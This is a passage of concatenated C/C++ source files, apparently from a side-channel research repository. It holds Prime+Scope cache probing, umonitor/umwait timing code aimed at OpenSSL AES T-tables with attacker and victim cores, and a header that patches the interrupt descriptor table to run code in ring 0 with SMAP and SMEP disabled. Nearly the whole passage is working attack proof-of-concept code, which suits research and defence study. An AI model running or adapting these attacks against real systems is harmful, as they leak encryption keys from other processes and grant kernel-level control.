145 |                    "1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
146 |       cnt += carry;
147 |     }
148 |     cnt = cnt > (repeat / 2);
149 | 
150 |     fprintf(fd, "%d\n", cnt);
151 |     fflush(fd);
152 |   }
153 |   uint64_t stoptime = gettimestamp();
154 |   uint64_t usec_used = stoptime - starttime;
155 |   printf("receiver finished\n");
156 |   printf("[+] Raw Transmission rate (does not account initial overhead) %.1f b/s\n",
157 |          1.f * BITS_TO_SEND / ((usec_used)/1000000));
158 |   printf("[+] Raw Receiver rate (not actual bits) %.1f b/s\n",
159 |          1.f * BITS_TO_RECEIVE / ((usec_used)/1000000));
160 |   printf("[+] Time used: %d microseconds\n", (usec_used));
161 | 
162 |   return 0;
163 | }
164 | 
165 | 


--------------------------------------------------------------------------------
/comparison/ps/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <pthread.h>
  7 | #include <fcntl.h>
  8 | #include <time.h>
  9 | #include <sched.h>
 10 | #include "eviction.h"
 11 | #include "../cacheutils.h"
 12 | 
 13 | #define CORE1 2 
 14 | #define CORE2 3
 15 | 
 16 | #define OFFSET 17*64
 17 | 
 18 | volatile char __attribute__((aligned(4096))) data[4096];
 19 | volatile char ctrl[4096];
 20 | size_t event_internal = 500000;
 21 | 
 22 | 
 23 | void pin_to_core(int core) {
 24 |     cpu_set_t cpuset;
 25 |     pthread_t thread;
 26 | 
 27 |     thread = pthread_self();
 28 | 
 29 |     CPU_ZERO(&cpuset);
 30 |     CPU_SET(core, &cpuset);
 31 | 
 32 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 33 | }
 34 | 
 35 | void access_speculative2(void* ptr) {
 36 |     speculation_start(s);
 37 |     *(char*)ptr;
 38 |     speculation_end(s);
 39 | }
 40 | 
 41 | int cnt = 0;
 42 | size_t volatile t_sync = 0;
 43 | 
 44 | void* accessor(void* dummy) {
 45 |     pin_to_core(CORE2);
 46 | 
 47 |     int seed = time(NULL);
 48 |     srand(seed);
 49 |     printf("Go!\n");
 50 | 
 51 |     while(1) {
 52 |         sched_yield();
 53 |         size_t r = rand() % event_internal + 1;
 54 | 
 55 |         wait(r);
 56 | 	      //wait(event_internal);
 57 | 
 58 |         //access_speculative2(data);
 59 |         access_speculative2(data+OFFSET); // CONTROL
 60 |         cnt++;
 61 |     }
 62 | }
 63 | 
 64 | // Find Prime Access Patterns via tool PrimeTime (https://github.com/KULeuven-COSIC/PRIME-SCOPE/tree/main/primetime)
 65 | // B505_PR302_E0408_S1 2
 66 | void traverse_B505_PR302_E0408_S1(uint64_t* arr) {
 67 |   int i;
 68 |   for(i=0; i<12; i+=1) {
 69 |     maccess((void *) arr[i+4]);
 70 |     maccess((void *) arr[  0]);
 71 |     maccess((void *) arr[  0]);
 72 |     maccess((void *) arr[i+3]);
 73 |     maccess((void *) arr[  0]);
 74 |     maccess((void *) arr[  0]);
 75 |     maccess((void *) arr[i+2]);
 76 |     maccess((void *) arr[i+1]);
 77 |     maccess((void *) arr[i+0]);
 78 |     maccess((void *) arr[i+0]);
 79 |     maccess((void *) arr[i+1]);
 80 |     maccess((void *) arr[i+2]);
 81 |     maccess((void *) arr[i+3]);
 82 |     maccess((void *) arr[i+4]);
 83 |   }
 84 | }
 85 | 
 86 | void prime(uint64_t* arr)
 87 | {
 88 |   traverse_B505_PR302_E0408_S1(arr);
 89 | 	traverse_B505_PR302_E0408_S1(arr);
 90 | 	traverse_B505_PR302_E0408_S1(arr);
 91 |   traverse_B505_PR302_E0408_S1(arr);
 92 | 	traverse_B505_PR302_E0408_S1(arr);
 93 |   traverse_B505_PR302_E0408_S1(arr);
 94 | 	traverse_B505_PR302_E0408_S1(arr);
 95 | }
 96 | 
 97 | int main() {
 98 | 
 99 |   pin_to_core(CORE1);
100 |   memset(data, 1, sizeof(data));
101 |   //memset(ctrl, 2, sizeof(ctrl));
102 | 
103 |   int pos = 0, t = 0;
104 |   int start = time(NULL);
105 |   int current = time(NULL);
106 | 
107 |   Elem* eviction_set = evset_find(data);
108 | 
109 |   uint64_t evset[16];
110 |   list_to_array(eviction_set, evset);
111 |   size_t scope_time = 0, probe_scope_time = 0, count = 100000;
112 | 
113 |   // detect scope threshold
114 |   for (int i = 0; i < count; i++) {
115 |       size_t begin = rdtsc();
116 |       maccess(evset[0]);
117 |       size_t end = rdtsc();
118 |       mfence();
119 | 
120 |       scope_time += end - begin;
121 |       mfence();
122 |   }
123 | 
124 |   for (int i = 0; i < count; i++) {
125 |       maccess(data); mfence();
126 | 
127 |       size_t begin = rdtsc();
128 |       maccess(evset[0]);
129 |       size_t end = rdtsc();
130 |       mfence();
131 | 
132 |       probe_scope_time += end - begin;
133 |       mfence();
134 |       prime(evset); mfence();
135 |   }
136 | 
137 |   scope_time /= count;
138 |   probe_scope_time /= count;
139 | 
140 |   size_t scope_threshold = (probe_scope_time + scope_time * 2) / 3;
141 |   printf("scope_time: %ld  probe_scope_time: %ld\n", scope_time, probe_scope_time);
142 |   printf("scope_threshold: %ld\n", scope_threshold);
143 |   
144 |   maccess(data); mfence();
145 |   size_t begin = rdtsc();
146 |   prime(evset);
147 |   size_t end = rdtsc();
148 |   mfence();
149 |   printf("The spend time of per prime : %ld\n", end - begin);
150 | 
151 | 
152 |   pthread_t pt;
153 |   pthread_create(&pt, NULL, accessor, NULL);
154 | 
155 |   prime(evset); mfence();
156 | 
157 |   while(1) {
158 | 
159 |     // Windowless
160 |     
161 |     // Theoretical maximum value
162 |     // cnt++;  // comment another thread to see the well-sync state.
163 |     // maccess(data); mfence(); 
164 | 
165 |     size_t begin = rdtsc();
166 |     maccess(evset[0]);
167 |     size_t end = rdtsc();
168 |     mfence();
169 | 
170 |     if (end-begin > scope_threshold) {
171 |       pos++;
172 |       prime(evset); mfence(); 
173 |       //prime(evset); mfence();
174 |     }
175 | 
176 |     // avoid a broken prime stage
177 |     if (cnt%20==0) {
178 |       prime(evset); mfence();
179 |     }
180 | 
181 |     current = time(NULL);
182 |     if(start != current) {
183 |       start = current;
184 |       sched_yield();
185 | 
186 |       printf("%5d / %5d (%.2f) \n", pos, cnt, pos * 100.0 / cnt);
187 |       t++;
188 |       pos = 0;
189 |       cnt = 0;
190 | 
191 |       if (t == 100) {
192 |         t = 0;
193 |         event_internal = event_internal * 4 / 5;
194 |         printf("event_internal alters!!!\n\n");
195 |         if (event_internal < 1000)
196 |           break;
197 |       }
198 |     }
199 |   }
200 | 
201 | }
202 | 
203 | 


--------------------------------------------------------------------------------
/aes_example/umwait/main.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <string.h>
  3 | #include <stdint.h>
  4 | #include <unistd.h>
  5 | #include <stdlib.h>
  6 | #include <openssl/aes.h>
  7 | #include <fcntl.h>
  8 | #include <sched.h>
  9 | #include <sys/mman.h>
 10 | #include "../cacheutils.h"
 11 | #include <pthread.h>
 12 | #include <map>
 13 | #include <vector>
 14 | 
 15 | 
 16 | // more encryptions show features more clearly
 17 | #define NUMBER_OF_ENCRYPTIONS (100)
 18 | 
 19 | #define CORE_VICTIM 1
 20 | #define CORE_ATTACKER 0
 21 | 
 22 | #define OFFSET 64 * 21
 23 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test+OFFSET), "c"(0), "d"(0));
 24 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 25 | 
 26 | #define STEP 2
 27 | 
 28 | #define T_INIT 35885
 29 | 
 30 | #define ABS(x) ((x) > 0 ? (x) : (-(x)))
 31 | 
 32 | __attribute__((aligned(4096))) char test[4096];
 33 | 
 34 | unsigned char key[] =
 35 | {
 36 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 37 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 38 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 39 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
 40 |   //0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc, 0x4f, 0x6e, 0x9c,
 41 |   //0x2a, 0x15, 0x5f, 0x5f, 0x0b, 0x25, 0x77, 0x6b, 0x70, 0xcd, 0xe2, 0xf7, 0x80
 42 | };
 43 | 
 44 | 
 45 | void pin_to_core(int core) {
 46 |     cpu_set_t cpuset;
 47 |     pthread_t thread;
 48 | 
 49 |     thread = pthread_self();
 50 | 
 51 |     CPU_ZERO(&cpuset);
 52 |     CPU_SET(core, &cpuset);
 53 | 
 54 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 55 | }
 56 | 
 57 | typedef size_t (*sfnc_t)(void);
 58 | 
 59 | size_t volatile t_sync = 0;
 60 | size_t volatile t = 0;
 61 | int volatile is_probe_in_Te;
 62 | 
 63 | std::map<char*, std::map<size_t, size_t> > timings;
 64 | 
 65 | char* base;
 66 | char* probe;
 67 | char* end;
 68 | 
 69 | unsigned char plaintext[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
 70 | unsigned char ciphertext[128];
 71 | 
 72 | #define START_MEASURE     maccess(test+OFFSET); t_sync = 1; asm volatile("mfence"); 
 73 | #define STOP_MEASURE      asm volatile("lfence");
 74 | 
 75 | void aes_measure(sfnc_t func, unsigned char* plaintext, unsigned char* ciphertext, AES_KEY* key_struct) {
 76 |     for (size_t j = 1; j < 16; ++j)
 77 |         plaintext[j] = rand() % 256;
 78 | 
 79 |     flush(probe);
 80 | 
 81 |     size_t local_t = t;
 82 |     AES_encrypt(plaintext, ciphertext, key_struct);
 83 | 
 84 |     START_MEASURE
 85 | 
 86 |     for(size_t w = 0; w < local_t; w++) asm volatile("nop\nnop\nnop\nnop\nnop\nnop\nnop\nnop");
 87 | 
 88 |     // the observed event
 89 |     size_t x = *(volatile size_t*)probe;
 90 |     asm volatile("lfence");
 91 |     test[OFFSET] = x; 
 92 | 
 93 |     STOP_MEASURE
 94 | }
 95 | 
 96 | void* aes_thread(void* dummy) {
 97 |     pin_to_core(CORE_ATTACKER);
 98 |     sleep(1);
 99 |     printf("Measuring...\n");
100 | 
101 |     AES_KEY key_struct;
102 | 
103 |     AES_set_encrypt_key(key, 128, &key_struct);
104 | 
105 |     uint64_t min_time = rdtsc();
106 |     srand(min_time);
107 | 
108 |     while(1) {
109 |         aes_measure(NULL, plaintext, ciphertext, &key_struct);
110 | 	    while(t_sync);
111 |     }
112 | }
113 | 
114 | int main()
115 | {
116 |     int fd = open("/home/rzhang/openssl/libcrypto.so", O_RDONLY);
117 |     size_t size = lseek(fd, 0, SEEK_END);
118 |     if (size == 0)
119 |         exit(-1);
120 |     size_t map_size = size;
121 |     if ((map_size & 0xFFF) != 0)
122 |     {
123 |         map_size |= 0xFFF;
124 |         map_size += 1;
125 |     }
126 |     base = (char*) mmap(0, map_size, PROT_READ, MAP_SHARED, fd, 0);
127 |     end = base + size;
128 | 
129 |     memset(test, 1, sizeof(test));
130 | 
131 |     pin_to_core(CORE_VICTIM);
132 | 
133 |     pthread_t p;
134 |     pthread_create(&p, NULL, aes_thread, NULL);
135 |     sched_yield();
136 |     
137 |     t = T_INIT;
138 |     size_t timeout = 0, writes = 0;
139 |     
140 |     //FILE* f = fopen("log.csv", "w");
141 | 
142 |     size_t te0 = 0x15df80;
143 |     size_t te1 = 0x15db80;
144 |     size_t te2 = 0x15d780;
145 |     size_t te3 = 0x15d380;
146 | 
147 |     for (size_t byte = 0; byte < 256; byte += 16) 
148 |     {
149 | 	    plaintext[0] = byte;
150 | 
151 |         for (probe = base + te0; probe < base + te0 + 64*16; probe += 64)
152 |         //for (probe = base; probe < end; probe += 64)
153 |         {
154 |             for (size_t i = 0; i < NUMBER_OF_ENCRYPTIONS; ++i)
155 |             {
156 |                 while(!(t_sync));
157 |                 INSTR_MONITOR
158 |                 size_t carry = 0;
159 |                 INSTR_WAIT
160 | 
161 |                 if(!carry) {
162 |                     writes++;
163 |                 }
164 |                 t_sync = 0;
165 |             }
166 |             sched_yield();
167 |             timings[probe][byte] = writes;
168 |             sched_yield();
169 | 
170 |             //fprintf(f, "%p, %f\n", (void*)(probe - base), timeout * 100.0 / (timeout + writes));
171 |             //fflush(f);
172 |                 
173 |             timeout = 0;
174 |             writes = 0;
175 |         }
176 |     }
177 | 
178 |     for (auto ait : timings)
179 |     {
180 |         printf("%p", (void*) (ait.first - base));
181 |         for (auto kit : ait.second)
182 |         {
183 |             printf(",%6lu", kit.second);
184 |         }
185 |         printf("\n");
186 |     }
187 | 
188 |     close(fd);
189 |     munmap(base, map_size);
190 |     fflush(stdout);
191 |     return 0;
192 | }
193 | 


--------------------------------------------------------------------------------
/aes_example/calibration/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <stdint.h>
  5 | #include <unistd.h>
  6 | #include <stdlib.h>
  7 | #include <openssl/aes.h>
  8 | #include <fcntl.h>
  9 | #include <sched.h>
 10 | #include <sys/mman.h>
 11 | #include "../cacheutils.h"
 12 | #include <pthread.h>
 13 | #include <sys/types.h>
 14 | #include <sys/stat.h>
 15 | 
 16 | 
 17 | // more encryptions show features more clearly
 18 | #define NUMBER_OF_ENCRYPTIONS (100)
 19 | 
 20 | #define CORE_VICTIM 1
 21 | #define CORE_ATTACKER 0
 22 | 
 23 | #define OFFSET 64 * 21
 24 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test+OFFSET), "c"(0), "d"(0));
 25 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 26 | 
 27 | #define STEP 2
 28 | 
 29 | // result from pad
 30 | #define T_INIT 62810
 31 | 
 32 | #define ABS(x) ((x) > 0 ? (x) : (-(x)))
 33 | 
 34 | __attribute__((aligned(4096))) char test[4096];
 35 | 
 36 | unsigned char key[] =
 37 | {
 38 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 39 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 40 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 41 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
 42 |   //0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc, 0x4f, 0x6e, 0x9c,
 43 |   //0x2a, 0x15, 0x5f, 0x5f, 0x0b, 0x25, 0x77, 0x6b, 0x70, 0xcd, 0xe2, 0xf7, 0x80
 44 | };
 45 | 
 46 | 
 47 | void pin_to_core(int core) {
 48 |     cpu_set_t cpuset;
 49 |     pthread_t thread;
 50 | 
 51 |     thread = pthread_self();
 52 | 
 53 |     CPU_ZERO(&cpuset);
 54 |     CPU_SET(core, &cpuset);
 55 | 
 56 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 57 | }
 58 | 
 59 | typedef size_t (*sfnc_t)(void);
 60 | 
 61 | size_t volatile t_sync = 0;
 62 | size_t volatile t = 0;
 63 | int volatile is_probe_in_Te;
 64 | char* base;
 65 | char* probe;
 66 | char* end;
 67 | size_t fail = 0;
 68 | 
 69 | #define START_MEASURE     maccess(test+OFFSET); t_sync = 1; asm volatile("mfence"); 
 70 | #define STOP_MEASURE      asm volatile("mfence");
 71 | 
 72 | void aes_measure(sfnc_t func, char* plaintext, char* ciphertext, AES_KEY* key_struct) {
 73 |     for (size_t j = 1; j < 16; ++j)
 74 |         plaintext[j] = rand() % 256;
 75 | 
 76 |     flush(probe);
 77 | 
 78 |     size_t local_t = t;
 79 |     AES_encrypt(plaintext, ciphertext, key_struct);
 80 | 
 81 |     START_MEASURE
 82 | 
 83 |     for(size_t w = 0; w < local_t; w++) asm volatile("nop\nnop\nnop\nnop\nnop\nnop\nnop\nnop");
 84 | 
 85 |     size_t x = *(volatile size_t*)probe;
 86 |     asm volatile("lfence");
 87 |     test[OFFSET] = x; 
 88 | 
 89 |     STOP_MEASURE
 90 | }
 91 | 
 92 | void* aes_thread(void* dummy) {
 93 |     pin_to_core(CORE_ATTACKER);
 94 |     sleep(1);
 95 |     printf("Measuring...\n");
 96 | 
 97 |     unsigned char plaintext[] =
 98 |     {
 99 |     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
100 |     };
101 |     unsigned char ciphertext[128];
102 | 
103 |     AES_KEY key_struct;
104 | 
105 |     AES_set_encrypt_key(key, 128, &key_struct);
106 | 
107 |     uint64_t min_time = rdtsc();
108 |     srand(min_time);
109 | 
110 |     while(1) {
111 |         aes_measure(NULL, plaintext, ciphertext, &key_struct);
112 |         while(t_sync);
113 |     }
114 | }
115 | 
116 | int main()
117 | {
118 |     int fd = open("/home/rzhang/openssl/libcrypto.so", O_RDONLY);
119 |     size_t size = lseek(fd, 0, SEEK_END);
120 |     if (size == 0)
121 |         exit(-1);
122 |     size_t map_size = size;
123 |     if ((map_size & 0xFFF) != 0)
124 |     {
125 |         map_size |= 0xFFF;
126 |         map_size += 1;
127 |     }
128 |     base = (char*) mmap(0, map_size, PROT_READ, MAP_SHARED, fd, 0);
129 |     end = base + size;
130 | 
131 |     memset(test, 1, sizeof(test));
132 | 
133 |     pin_to_core(CORE_VICTIM);
134 | 
135 |     pthread_t p;
136 |     pthread_create(&p, NULL, aes_thread, NULL);
137 |     sched_yield();
138 | 
139 |     ssize_t sum = 0, cnt = 0, mcnt = 0;
140 |     
141 |     t = T_INIT;
142 |     size_t misses = 0, hits = 0, tries = 0;
143 |     
144 |     size_t te0 = 0x15df80;
145 |     size_t te1 = 0x15db80;
146 |     size_t te2 = 0x15d780;
147 |     size_t te3 = 0x15d380;
148 | 
149 |     for (probe = base + te3 - 64*16*4; probe < base + te0 + 64*16 + 64*16*4; probe += 64)
150 |     // for (probe = base; probe < end; probe += 64)
151 |     {
152 |         for (size_t i = 0; i < NUMBER_OF_ENCRYPTIONS; ++i)
153 |         {
154 |             while(!(t_sync)); 
155 |             INSTR_MONITOR
156 |             size_t carry = 0;
157 |             INSTR_WAIT
158 |            
159 | 
160 |             if(carry) {
161 |                 misses++;
162 |             } else {
163 |                 hits++;
164 |             }
165 |             
166 |             tries++;
167 |             t_sync = 0;
168 |         }
169 | 
170 | 	    if(tries == NUMBER_OF_ENCRYPTIONS) {
171 | 	    
172 | 	        is_probe_in_Te = probe >= base + te3 && probe < base + te0 + 64*16;
173 |             printf("is_Probe_in_Te: %d, T:%zd  Misses: %.2f  Hits: %.2f\n", is_probe_in_Te, t, misses * 100.0 / tries,  hits * 100.0 / tries);
174 | 
175 | 	        if(hits >= 0.80 * NUMBER_OF_ENCRYPTIONS) {
176 | 	            printf("Potential Target: 0x%lx\n", probe-base);
177 |                 hits = 0;
178 |                 misses = 0;
179 |                 tries = 0;
180 |                 for (size_t i = 0; i < 20000; ++i)
181 |                 {
182 |                     while(!(t_sync));
183 |                     INSTR_MONITOR
184 |                     size_t carry = 0;
185 |                     INSTR_WAIT
186 | 
187 |                     if(carry) {
188 |                         misses++;
189 |                     } else {
190 |                         hits++;
191 |                     }
192 | 
193 |                     tries++;
194 |                     t_sync = 0;
195 |                 }
196 |                 if(hits >= 0.90 * 20000) {
197 |                     printf("FOUND TE!!! is_Probe_in_Te: %d, T:%zd  Misses: %.2f  Hits: %.2f\n", is_probe_in_Te, t, misses * 100.0 / tries,  hits * 100.0 / tries);
198 |                     if(is_probe_in_Te==1){
199 |                         printf("FAIL TIME: %ld", fail);
200 |                         exit(0);
201 |                     }
202 |                     else {
203 |                         fail += 1;
204 |                     }
205 |                 }
206 |             }
207 | 	    
208 |             tries = 0;
209 |             misses = 0;
210 | 	        hits = 0;
211 |    
212 |         }
213 | 
214 |     }
215 | 
216 |     printf("FAIL!!!, T:%zd\n",t);
217 | 
218 |     close(fd);
219 |     munmap(base, map_size);
220 |     fflush(stdout);
221 |     return 0;
222 | }
223 | 


--------------------------------------------------------------------------------
/trigger-tester/r0e.h:
--------------------------------------------------------------------------------
  1 | #define __USE_GNU
  2 | #define _GNU_SOURCE
  3 | #include "ptedit_header.h"
  4 | #include <memory.h>
  5 | #include <sched.h>
  6 | #include <setjmp.h>
  7 | #include <stdint.h>
  8 | #include <stdio.h>
  9 | #include <sys/mman.h>
 10 | 
 11 | #define R0E_VECTOR 200
 12 | 
 13 | 
 14 | #ifndef var_to_string
 15 | #define __var_to_string(x) #x
 16 | #define _var_to_string(x) __var_to_string(x)
 17 | #define var_to_string(x) _var_to_string(x)
 18 | #endif
 19 | 
 20 | /**
 21 |  * Struct for the IDT
 22 |  */
 23 | typedef struct {
 24 |   uint16_t limit;
 25 |   size_t base __attribute__((packed));
 26 | } r0e_idt_t;
 27 | 
 28 | /**
 29 |  * Struct defining an IDT entry
 30 |  */
 31 | typedef struct {
 32 |   uint16_t offset_1; // offset bits 0..15
 33 |   uint16_t selector; // a code segment selector in GDT or LDT
 34 |   uint8_t ist;       // bits 0..2 holds Interrupt Stack Table offset, rest of bits zero.
 35 |   uint8_t gate : 4;
 36 |   uint8_t z : 1;
 37 |   uint8_t dpl : 2;
 38 |   uint8_t p : 1;
 39 |   uint16_t offset_2; // offset bits 16..31
 40 |   uint32_t offset_3; // offset bits 32..63
 41 |   uint32_t zero;     // reserved
 42 | } r0e_idt_entry_t;
 43 | 
 44 | /**
 45 |  * Function pointer signature for the callback function
 46 |  */
 47 | typedef size_t (*r0e_callback_t)(void);
 48 | 
 49 | /** Original return address for the IRQ handler */
 50 | static size_t __attribute__((aligned(4096))) r0e_ret_addr = 0;
 51 | /** Address of callback function */
 52 | static size_t __attribute__((aligned(4096))) r0e_entry_point = 0;
 53 | /** Virtual address of the IDT */
 54 | static r0e_idt_entry_t *r0e_sys_idt;
 55 | /** Original IDT entry for the used interrupt vector */
 56 | static r0e_idt_entry_t r0e_original_entry;
 57 | 
 58 | /**
 59 |  * User-space interrupt handler for calling the callback function.
 60 |  * Disables SMAP and SMEP to make all virtual memory usable for the callback. 
 61 |  */
 62 | static void __attribute__((naked, aligned(4096))) r0e_irq_handler() {
 63 |   asm volatile("mov %cr4, %r11\n"
 64 |                "andq $~0x300000, %r11\n"
 65 |                "mov %r11, %cr4\n"               // disable SMAP and SMEP
 66 |                "mov (%rsp), %r11\n"
 67 |                "mov %r11, r0e_ret_addr(%rip)\n" // save original return address
 68 |                "mov r0e_entry_point(%rip), %r11\n"
 69 |                "callq *%r11\n"                  // call callback
 70 |                "mov r0e_ret_addr(%rip), %r11\n"
 71 |                "mov %r11, (%rsp)\n"             // restore return address
 72 |                "iretq\n"                        // return to ring 3
 73 |                ".align 4096\n"
 74 |                "nop\n");                        // ensure irq handler is at least one page
 75 | }
 76 | 
 77 | /**
 78 |  * Pretty-print an IDT entry
 79 |  *
 80 |  * @param[in] entry The IDT entry
 81 |  *
 82 |  */
 83 | static void r0e_dump_idt_entry(r0e_idt_entry_t entry) {
 84 |   printf(
 85 |       "Selector(%d), IST(%d), P(%d), DPL(%d), Z(%d), gate(%d), offset(%zx)\n",
 86 |       entry.selector, entry.ist, entry.p, entry.dpl, entry.z, entry.gate,
 87 |       entry.offset_1 | (((size_t)entry.offset_2) << 16) |
 88 |           (((size_t)entry.offset_3) << 32));
 89 | }
 90 | 
 91 | /**
 92 |  * Map the IDT to the virtual-address space
 93 |  *
 94 |  * @return A virtual address that can be used to access the IDT
 95 |  */
 96 | static void *r0e_map_idt() {
 97 |   r0e_idt_t idt;
 98 |   asm volatile("sidt %0" : "=m"(idt) : : "memory");
 99 |   // umip prevents us from getting the real IDT base address, make an educated guess for Linux
100 |   if(idt.base >= 0xffffffffffff0000ull) {
101 |        idt.base = 0xfffffe0000000000ull;
102 |   }
103 |   size_t pfn = ptedit_pte_get_pfn((void *)(idt.base), 0);
104 |   if(!pfn) {
105 |     return NULL;
106 |   }
107 |   return ptedit_pmap(pfn * 4096, 4096);
108 | }
109 | 
110 | int r0e_lock_user_page(void* addr) {
111 |   *(volatile char *)addr; // force mapping
112 |   // prevent swapping
113 |   return mlock(addr, 4096);
114 | }
115 | 
116 | /**
117 |  * Initialize r0e
118 |  *
119 |  * @return 0 on sucess, 1 otherwise
120 |  */
121 | int r0e_init() {
122 |   if (ptedit_init()) {
123 |     fprintf(stderr, "[r0e] Could not init PTEditor\n");
124 |     return 1;
125 |   }
126 | 
127 | #if 0
128 |   // freeze to core
129 |   int cpu = 0;
130 |   getcpu(&cpu, NULL);
131 |   cpu_set_t mask;
132 |   mask.__bits[0] = 1 << cpu;
133 |   if (sched_setaffinity(getpid(), sizeof(cpu_set_t), &mask)) {
134 |     fprintf(stderr, "[r0e] Could not lock application to current core\n");
135 |     return 1;
136 |   }
137 | #endif
138 | 
139 |   if(r0e_lock_user_page(r0e_irq_handler)) {
140 |     fprintf(stderr, "[r0e] Could not lock IRQ handler in memory\n");
141 |     return 1;
142 |   }
143 |   if(r0e_lock_user_page(&r0e_ret_addr) || r0e_lock_user_page(&r0e_entry_point)) {
144 |     fprintf(stderr, "[r0e] Could not lock global data in memory\n");
145 |     return 1;
146 |   }
147 |   // bring irq handler into the kernel
148 |   ptedit_pte_clear_bit(r0e_irq_handler, 0, PTEDIT_PAGE_BIT_USER); 
149 | 
150 |   // map IDT to add IRQ handler
151 |   r0e_sys_idt = (r0e_idt_entry_t *)r0e_map_idt();
152 |   if(!r0e_sys_idt) {
153 |     fprintf(stderr, "[r0e] Could not find IDT\n");
154 |     return 1;
155 |   }
156 | 
157 | #define LOW_PTR(x) (((size_t)(x)) & 0xffff)
158 | #define MID_PTR(x) ((((size_t)(x)) >> 16) & 0xffff)
159 | #define HIGH_PTR(x) ((((size_t)(x)) >> 32) & 0xffffffff)
160 | #define GATE_INTERRUPT 14
161 | #define GATE_TRAP 15
162 | #define USER_DPL 3
163 | #define KERNEL_DPL 0
164 | 
165 |   r0e_idt_entry_t patched_idt_entry;
166 |   patched_idt_entry.dpl = USER_DPL;
167 |   patched_idt_entry.p = 1;
168 |   patched_idt_entry.z = 0;
169 |   patched_idt_entry.ist = 0;
170 |   patched_idt_entry.gate = GATE_INTERRUPT;
171 |   patched_idt_entry.selector = 16;
172 |   patched_idt_entry.offset_1 = LOW_PTR(r0e_irq_handler);
173 |   patched_idt_entry.offset_2 = MID_PTR(r0e_irq_handler);
174 |   patched_idt_entry.offset_3 = HIGH_PTR(r0e_irq_handler);
175 | 
176 |   r0e_original_entry = r0e_sys_idt[R0E_VECTOR];
177 |   r0e_sys_idt[R0E_VECTOR] = patched_idt_entry;
178 |   return 0;
179 | }
180 | 
181 | /**
182 |  * Cleanup r0e when no other functionality of r0e is required anymore
183 |  */
184 | void r0e_cleanup() {
185 |   r0e_sys_idt[R0E_VECTOR] = r0e_original_entry;
186 |   munmap(r0e_sys_idt, 4096);
187 |   munlock(r0e_irq_handler, 4096);
188 |   ptedit_cleanup();
189 | }
190 | 
191 | /**
192 |  * Execute a callback function in ring 0
193 |  *
194 |  * @param[in] fnc The callback function that should be executed in ring 0
195 |  *
196 |  * @return The return value of the callback function
197 |  */
198 | size_t __attribute__((naked)) r0e_unsafe_call(r0e_callback_t fnc) {
199 |   asm volatile("push %%rbx\n"
200 |                "push %%rcx\n"
201 |                "push %%rdx\n"
202 |                "push %%rsi\n"
203 |                "push %%rdi\n"
204 |                "push %%r8\n"
205 |                "push %%r9\n"
206 |                "push %%r10\n"
207 |                "push %%r11\n" // save registers
208 |                "mov %%rdi, %0\n" // store entry point in r0e_entry_point
209 |                "int $" var_to_string(R0E_VECTOR) "\n" // go to ring0 using interrupt
210 |                "pop %%r11\n"
211 |                "pop %%r10\n"
212 |                "pop %%r9\n"
213 |                "pop %%r8\n"
214 |                "pop %%rdi\n"
215 |                "pop %%rsi\n"
216 |                "pop %%rdx\n"
217 |                "pop %%rcx\n"
218 |                "pop %%rbx\n" // restore registers
219 |                "retq" : "=m"(r0e_entry_point) : : "memory");
220 | }
221 | 
222 | /**
223 |  * Execute a callback function in ring 0, ensuring that the executed code is in memory
224 |  *
225 |  * @param[in] fnc The callback function that should be executed in ring 0
226 |  *
227 |  * @return The return value of the callback function
228 |  */
229 | size_t r0e_call(r0e_callback_t fnc) {
230 |   if(r0e_lock_user_page(fnc)) {
231 |       return -1;
232 |   }
233 |   return r0e_unsafe_call(fnc);
234 | }
235 | 


--------------------------------------------------------------------------------
/aes_example/pp/eviction.c:
--------------------------------------------------------------------------------
  1 | #include <inttypes.h>
  2 | #include <stdlib.h>
  3 | #include <time.h>
  4 | #include <sys/mman.h>
  5 | #include <stdio.h>
  6 | #include <math.h>
  7 | 
  8 | #include "eviction.h"
  9 | 
 10 | #define EVICTION_THRESHOLD 80 
 11 | #define EVICTION_MEMORY_SIZE 64*1024*1024
 12 | #define EVICTION_SET_SIZE 16
 13 | #define PAGE_SIZE (1 << 12)
 14 | 
 15 | int
 16 | gt_eviction(Elem **ptr, Elem **can, char *victim);
 17 | 
 18 | static uint64_t rdtsc() {
 19 |   uint64_t a, d;
 20 |   asm volatile("mfence");
 21 |   asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 22 |   a = (d << 32) | a;
